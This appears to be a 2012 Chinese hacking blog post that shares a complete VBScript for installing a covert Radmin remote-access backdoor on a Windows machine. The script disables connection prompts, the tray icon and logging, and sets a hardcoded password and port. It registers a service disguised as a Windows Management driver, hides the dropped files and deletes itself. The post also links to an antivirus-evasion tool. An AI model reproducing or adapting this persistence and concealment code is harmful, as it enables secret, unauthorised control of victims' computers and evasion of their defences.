[黑客必备] Vbs脚本实现radmin终极后门 [工具打包]

[黑客必备] Vbs脚本实现radmin终极后门 [工具打包]
2012年01月16日
  在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
  on error resume next
  const HKEY_LOCAL_MACHINE = &H80000002
  strComputer = "."
  Set StdOut = WScript.StdOut
  Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
  strComputer & "\root\default:StdRegProv")
  strKeyPath = "SYSTEM\RAdmin"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\RAdmin\v2.0"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")
  strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
  uBinary = Array(1,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
  uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
  uBinary = Array(5,4,0,0) //端口:1029
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
  uBinary = Array(10,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
  Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
  strValueName = "LogFilePath"
  strValue = "c:\logfile.txt"
  set wshshell=createobject ("wscript.shell")
  a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)
  oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
  strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
  strValueName = "Description"
  strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
  oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  strValueName = "DisplayName"
  strValue = "Windows Management Instrumentation Player Drivers"
  oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  strValueName = "ImagePath"
  strValue = "c:\windows\system32\Exporer.exe /service"
  oreg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  set wshshell=createobject ("wscript.shell")
  a=wshshell.run ("net start WinManageHelp",0)
  b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)
  c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0)
  d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)
  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删
  免杀工具下载地址:http://bbs.163day.net/read.php?tid-498.html

你可能感兴趣的:(技术杂绘)